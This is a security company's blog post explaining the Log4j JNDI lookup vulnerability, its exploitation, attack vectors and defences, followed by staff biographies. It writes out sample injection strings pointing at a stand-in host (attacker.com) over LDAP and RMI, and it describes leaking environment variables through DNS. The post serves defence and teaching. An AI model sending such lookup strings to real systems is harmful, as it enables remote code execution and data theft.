Log4j Vulnerability: The Impact, Exploitation, Attack Vectors, and Defence Mechanisms

Joseph Ikhalia
Joseph Ikhalia

Riela Cyber Security Engineer & Threat Management Lead

What is Log4j vulnerability?

  • Log4j is a Java library extremely popular with Java developers and it is used for logging application events. The vulnerability was introduced in version 2.0-beta9 of the Log4j Java library.
  • The introduction of a new Plugin – JNDI Lookups to the Log4j library created the security vulnerability.
  • JNDI (Java Naming and Directory Interface) Lookup Plugin is a data enrichment Plugin that allows developers to enrich the data being logged by Log4j library.
  • JNDI is a mechanism (API) that allows Java programs to perform lookups to objects.
  • JNDI supports several other protocols which include LDAP (Lightweight Directory Access Protocol), RMI (remote method invocation), DNS (Domain Name System), and CORBA (Common Object Request Broker Architecture).
  • Log4j vulnerability is an input validation vulnerability that parses any input received by users through any channel that the library receives input from.
  • Although most of the attacks today affect web applications, any Lookup that ends up in a vulnerable log4j library can potentially be used as an exploit.
  • Log4j library treats user input as some form of a format string.
  • It looks for a Lookup in any input that starts with characters ${jndi:[Specify the Protocol to be Used] e.g., ${jndi:ldap://attacker.com:1234/a} or ${jndi:rmi://attacker.com:9191/a}.
  • Log4j will attempt to parse the above Lookup and if successful – it will perform a Lookup action to enrich the data that is being logged into a log.
  • The issue here is that a remote code execution attack is possible when using JNDI and LDAP.
  • LDAP allows the storage of Java objects that are serialized into LDAP – when a Java application tries to fetch an LDAP object and sees there is an object it needs to execute to successfully populate data – it will execute the code happily. This leads to remote code execution attacks where exploitation is easy.

How Log4j Vulnerability is Exploited

  • An attacker must submit a Lookup that points to a server they control. For example, the following Lookups using the LDAP and RMI protocols respectively

${jndi:ldap://attacker.com:1234/a}

${jndi:rmi://attacker.com:9191/a}

  • When an application using a vulnerable Log4j library encounters the above Lookup strings, it will parse it by firstly contacting an LDAP server running on attacker.com on TCP port 1234 and it will try to fetch an object that will tell it how to resolve it.
  • When the LDAP request is received by the attacker, they can;
  • Serve Java serialized object back immediately
  • Serve a reference back to the vulnerable library which goes back to an arbitrary server to fetch a malicious object and execute it
  • Most of the exploits today uses the LDAP protocol.
  • An attacker can use hostnames, in which case the resolver will automatically try to resolve those DNS names and this can be used for exfiltration of very sensitive data. For example, an attacker can embed an environment variable from the target server into the hostname and this will end up leaking the variable to the attacker if the attacker controls the DNS zone that was used in the attack.

Log4j Attack Vectors

  • Basically, any user-supplied input that is parsed by Log4j is a potential attack vector
  • Currently, there are bots blindly attacking web pages and sending the JDNI to exploit strings in various request headers.
log4j vulnerability
  • Exploitations using the attack vector in the screenshot above can only catch the low hanging fruits.
  • If a web application is protected by a login form, any parameter that gets passed by Log4j is a potential input vector.
  • Keep in mind that if you scan your IT estate and do not find any vulnerable application, it doesn’t mean you are completely safe because remote checks are quite limited.
  • As seen in the case of Minecraft, Log4j can be exploited on the client and server-side of the application.
  • If you have a client application that contains a vulnerable Log4j library, and a malicious server sends data to the client library – the client could be exploited as well. This implies that it will take an awful amount of time to fix the Log4j vulnerability, unfortunately.
Requirements for an Attacker to Exploit Log4j Vulnerability
  • An attacker must be able to deliver their malicious input that will be processed by a vulnerable Log4j library (currently versions 2.0-beta9 – 2.14 are vulnerable), while version 2.15 is not vulnerable.
  • Most current exploits require that the server on which the affected application is running connects back to the attacker server or any other server that is under the attackers’ control. This is needed for the attacker to push back the Java serialized object that will be executed by the vulnerable Java code.
Defence Mechanism Against Log4j Exploits
  • If you prevent your servers from directly connecting to the internet, you can limit the exposure to Log4j exploitation. Although this is not a silver bullet – particularly if the victim is running Apache Tomcat or WebSphere, there are ways to exploit Log4j vulnerability without having the server running the vulnerable library connect back to the attacker. However, such exploits haven’t been seen in the wild yet.
  • Apply appropriate firewall rules that would ensure the application servers only make remote calls to the systems they are allowed to talk to – this increases the effort of the attacker dramatically and reduces the potential risk.
  • Follow vendors guidance to apply the latest patch on affected systems, ideally, patches should be applied to development environments first to avoid production outages.
  • If you cannot patch – disable remote
  • Depending on the Java version, some attacks could be more difficult than others.
  • Use the IMMA Technique:

Isolate – your application servers with a Firewall.

Minimize – run applications with the least privilege account.

Monitor – strange network activity.

Active Defense – deploy honeypots to find exploitation reconnaissance and deploy honey data near suspected vulnerable apps.

  • Attackers always leave a footprint, ensure to monitor all hosts and networks for the following IoCs

Hosts

  • CPU spike
  • Unauthorised configuration changes
  • Disparate logs & commands needed

Network

  • Unexpected connections – AKA a new host
  • Unexpected volume – do “top talker” analysis
  • Long connections – persistent access? Slow exil?
 
For more information, contact us today,
For Confidential Assistance in Handling Log4j/2, Speak to an Expert Today

Fill out your details below and an Engineer from our team will get in touch with you as soon as possible.

Subscribe to our newsletter

Stay updated with our latest blogs and company updates.

GET A QUOTE

we’re Here
To Assist You

Something isn’t Clear?

Feel free to contact us, and we will be more than happy to answer all of your questions.

Karamo

Karamo Njie

Infrastructure and Network Engineer

Karamo Njie is Riela Tech’s Infrastructure and Network Engineer, working closely alongside Tim and Marc on the tech team as he pursues his passion for technology and problem-solving. Karamo is committed to maintaining cutting-edge technologies with an up-to-date industry knowledge.

Working as an Infrastructure Support Engineer, Karamo is actively involved in engaging and helping clients on a daily basis, troubleshooting networking (windows, CISCO, Linux). Using bespoke tools to circumvent network and cyber security threats.

Email: karamo@riela-tech.com

Alexandria halsall

Marketing Executive

As a Marketing Executive, Alex is responsible for all marketing duties spanning the Riela Group.

Alex joined the Riela Group in August 2020, shortly after graduating with a Psychology degree from Nottingham Trent University.

With past work experience in content marketing, event management and web design, Alex is able to apply her creative and analytical skills into the Riela strategy.

Email: alex@riela-group.com

Telephone: +44 1624 640555

Peter Astell Burt

Director

Peter is an experienced technology consultant with a demonstrated history of working in the IT and cyber security industry.  Skilled in Search Engine Optimization (SEO), IT Strategy, Start-ups, Regulations, and Online Gaming. Strong consulting professional with a DPhil focused in Natural Sciences from ChristChurch, Oxford.

ROBERT TOBIN

Riela Group Managing Director

Robert Tobin is the Managing Director of the Riela Group of Companies and is responsible in overseeing our business operations, our people and driving excellence in all we do.

Rob brings over 25 years’ of successful leadership and entrepreneurial experience across a range of industries including Family Office, corporate services, construction engineering, Superyachts, cyber security and information technology development to our Group, and to our customers.

In the past 15 years Rob has gained a prominent reputation within the Superyacht industry for his passion, integrity, innovation and achievements to date.

“Being part of an awesome, capable and forward thinking team that have a shared passion for Superyachts, people and the environment is the highlight of my career and puts a smile on my face and a spring in my step everyday”.

Email: rob@riela-group.com

Telephone: +44 1624605650

Christian Goelz Riela Cyber

christian goelz

Director

Christian is involved across the Riela family of companies with particular attention to the technology businesses, Cyber and Tech.

Christian gained a postgraduate Master in Finance degree at the University of Neuchatel, Switzerland and completed his MBA at the University of Chicago Booth School of Business.

Before joining us, Christian worked for six years at Argosy Capital, an Isle of Man-based private equity and venture capital business focusing on early-stage growth businesses. At Argosy, he focused on managing investment companies, research and financial analysis and served as a director on several boards.

Dr Joseph Ikhalia

Joseph Ikhalia

Cyber Security Engineer, Risk and Threat Management Lead

Joseph is a Cyber Security Engineer and Risk lead in the security operations centre team. Joseph is responsible for internal audit and cyber risk management, vulnerability assessment, threat hunting and penetration testing to provide effective oversight of internal and client risk postures.

Joseph brings 8 years’ experience in risk & cybersecurity research, focusing on web-based technologies, security awareness innovation, malware threats, reverse engineering and systems audit.

With a PhD in Computer Science and a penchant for security innovation, Joseph specialises in threat detection using an avalanche of industry tools, techniques and methodologies to efficiently mitigate known and emerging threats facing our high valued clients.

SAÎD

Cyber Security Engineer & Incident Response Lead

Saîd is a Cyber Engineer & Incident Response Lead in the Security Operations Centre team.  Saîd brings his vast wealth of technical knowledge of security technologies to analyse and respond to security threats.  After 13 years experience in Cybersecurity, focusing on Identity & Access Management, PKI, Incident Response and SIEM, Saîd is instrumental in helping formulate our strategic approach.

Saîd has a Master’s degree in Computer Engineering and specializes in Information Security with certifications in CEH, CCSK, and Splunk.

Carey Cooper maritime security expert

Carey Cooper

Cyber Security Engineer & Security Operations Lead

Carey is the Cyber Security Operations team lead at the Riela Group of Companies.

He has a wealth of infrastructure and cyber security experience across the medical, financial, retail, and telecom sectors.  In addition he has a strong entrepreneurial spirit which is an asset in bridging the divide between technical and business.

Carey also holds numerous certifications in Microsoft, Cisco, Linux and the Cyber Security Disciplines.  He has a passion for anything related to technology.

Matthew Roberts

Group Head of Sales

As the Head of Group Sales at the Riela family of companies, Matthew leads the company’s sales strategy, execution, and growth.

Matthew has a successful record building trusted client relationship and delivering upon set expectations. An accomplished sales leader, he delivers a sales process that provides clients with the information and support they need to make the right decisions for their organisations and their constituents.

Matthew has significant experience within the maritime industry having previously worked across various sectors including insurance, security, satellite communications and managed IT. Matthew’s most recent experience encompasses almost 5 years spent with the leading satellite communications and managed IT provider in the maritime industry, focusing on their superyacht clientele.

Email: matthew@riela-group.com

Telephone: +44 7425 314973

Marc Dorey

Infrastructure & Managed Services Lead

Marc is our Group’s Infrastructure and Managed Services lead with over 18 years’ experience in delivering infrastructure projects across multiple industry verticals and international jurisdictions.  From projects in Aerospace and Engineering through to Banking and Insurance, from Europe, China, Africa and Australia.

This experience is matched with a varied list of certifications from leading industry vendors such as Hp, Cisco, Microsoft, Ruckus, CompTIA and more.  As a qualified technical trainer Marc is comfortably able to take complicated technical concepts and deliver them in simplistic terms to key decision makers and end users alike.

Most of Marc’s experience has been gained working for managed service providers, both large and niche and as such is able to take real world experience and blend it with industry standards to help align our service delivery with our clients values and processes.

jamie mills

SOC Analyst

Jamie Mills is the Riela Cyber SOC analyst, working alongside Joseph and Saîd. Jamie’s role involves the monitoring of client’s network and endpoints for malicious activity, thus mitigating cyber threats. This is done through using our software stack of security products and conducting OSINT (open-source intelligence) investigations to solve security incidents.

Jamie studied at the University of Portsmouth completing an undergraduate degree in Computer Forensics & Cyber Security, and achieved a masters degree in Data Analytics.

With previous experience as a Junior SOC analyst, Jamie is a highly motivated cyber security professional with a strong interest in Malware Analysis and Binary Exploitation.

Email: jamie.mills@riela-cyber.com

Josh Kingett

Technical Sales & Support

Josh is a Cyber Security Engineer specialising in Technical Sales and Support. Josh builds trust into each client relationship by working closely with business functions to deliver professionally tailored solutions for our clients from sales through to production and after care.

Having spent 4 years as an Officer Cadet in the British Army, Josh has had a great opportunity to develop his interpersonal and management skills to the highest standard possible. Josh is an avid public speaker and presents material regularly across different industries through seminars and online hosted events.

With an extensive competitive background in eSports and eGaming, both as a sponsored player and coach, Josh has been at the forefront of evolving technology, security and mitigation. It is this sort of experience that enables Josh to help facilitate the growth of Riela Cyber, alongside a highly qualified team of Cyber Security professionals.

Email: josh@riela-tech.com

Luke dawood

Infrastructure Engineer

Luke is an Infrastructure Engineer for the Riela Group with over 7 years of experience providing infrastructure support and solutions.

He currently holds his BSc in Computer Science, Microsoft Azure Administrator, Comptia A+, and Comptia N+ qualifications.

Most of his experience has been gained by working for Managed Service Providers that provide full IT support and solutions to companies ranging from small to large enterprises.

He is extremely passionate about technology and excellent customer service delivery, ensuring he is always kept up to date with the latest technologies and providing the best solutions to clients.

Andrew Clucas

Senior Network Engineer

Andy is a qualified Network Engineer with in-depth knowledge of architecting, implementing and supporting networking solutions in the SMB, Enterprise and Service Provider environments.

He has over 20 years of experience working across multiple vendor operating systems, including Cisco, Juniper, Linux and Microsoft, and has also been responsible for implementing a variety of large scale network services deployments, taking projects from design to rollout and support.

Andy also has experience of deploying and migrating a range of virtualisation technologies including VMWare, Hyper-V and KVM based systems.

Murat Guner

Infrastructure Engineer

Murat Guner joined the Riela Group in the Summer of 2021 as an Infrastructure Engineer.

Murat began his career in Turkey as a computer teacher for primary and secondary schools before migrating his skills into IT infrastructure. After honing his IT experiences throughout a colourful career path, Murat gained numerous qualifications which he is now excited to apply to the management of our Riela Tech infrastructure.

Paul Cocker

Service Delivery Coordinator

Paul Cocker joined the Riela Group in late 2021, after spending just under 20 years with his previous employer.

Paul is responsible for the Riela Tech service levels, working on both the dispatch function and SLA management. Paul carries out a variety of duties across the Network Operations Centre and works closely across the wider team to deliver professionally tailored solutions for our Riela Tech clients.

Linette joseph

Cyber Intern

Linette Joseph is Riela Cyber’s cyber intern. Linette supports Riela Cyber’s Security Operations Team (SOC) part-time whilst completing her A-Level studies. Linette has a keen interest in Digital Forensics and aspires to become a Cyber Security Analyst.

Linette’s interest in cyber security developed in year 12 after learning in-depth about web programming and JavaScript. This further developed Linette’s interest in the subject and sparked her curiosity and she began coding.

Through her internship with Riela Cyber Linette hopes to apply and expand her knowledge the industry and encourage other young women into cyber careers in the future.

Email: linette.joseph@rielacsc.com

kurt SCHRAUWEN

Director

Kurt Schrauwen is a Director of the Riela Group of companies which includes Riela Yachts, Riela Cyber and Riela Tech. 

Kurt brings more than 20 years of leadership experience having been an early part of the global success of Microgaming in becoming a market leader. Kurt was responsible for the commercial, contractual, and technical sales for Microgaming and with this experience will complement the company’s growth strategy.

Kurt is passionate about business optimisation and prides himself in having an intrapreneurial outlook to maximise staff potential, reduce inefficiencies as well as identifying and maturing revenue growth opportunities.

Email: kurt@riela-group.com

Telephone: +44 07826396008

Tim Bliss

Tim Bliss

Director

Tim Bliss, Managing Director of Riela Tech since the company foundation in 2015 and Director of Riela Cyber, brings over 20 years’ of successful leadership experience across a range of industries including finance and banking, software development, and manufacturing, as well as cyber security and information technology. Prior to forming the company he led the technology for Manx Financial Group PLC, where he was instrumental in business systems transformation.

“It is our hugely capable team of experts that drives our business – it is fantastic and rewarding to be able to use technology, intelligence, and great customer service to help make our clients’ business and staff progressively more efficient resilient and secure”

Email: tim@riela-tech.com

Phone: +44 7624 469677